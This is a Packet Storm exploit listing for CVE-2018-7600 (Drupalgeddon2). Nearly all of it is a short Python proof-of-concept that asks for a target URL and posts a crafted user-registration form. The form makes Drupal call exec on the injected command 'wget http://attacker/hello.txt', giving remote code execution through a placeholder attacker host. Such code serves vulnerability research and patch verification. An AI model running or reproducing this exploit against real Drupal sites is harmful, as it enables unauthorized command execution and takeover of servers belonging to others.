Lucene search

K
packetstormVitalii RudnykhPACKETSTORM:147181
HistoryApr 13, 2018 - 12:00 a.m.

Drupal Drupalgeddon2 Remote Code Execution

2018-04-1300:00:00
Vitalii Rudnykh
packetstormsecurity.com
118

0.976 High

EPSS

Percentile

100.0%

`#!/usr/bin/env  
import sys  
import requests  
  
print ('################################################################')  
print ('# Proof-Of-Concept for CVE-2018-7600')  
print ('# by Vitalii Rudnykh')  
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')  
print ('# https://github.com/a2u/CVE-2018-7600')  
print ('################################################################')  
print ('Provided only for educational or information purposes\n')  
  
target = raw_input('Enter target url (example: https://domain.ltd/): ')  
  
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'  
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}  
  
r = requests.post(url, data=payload)  
if r.status_code != 200:  
sys.exit("Not exploitable")  
print ('\nCheck: '+target+'hello.txt')  
  
`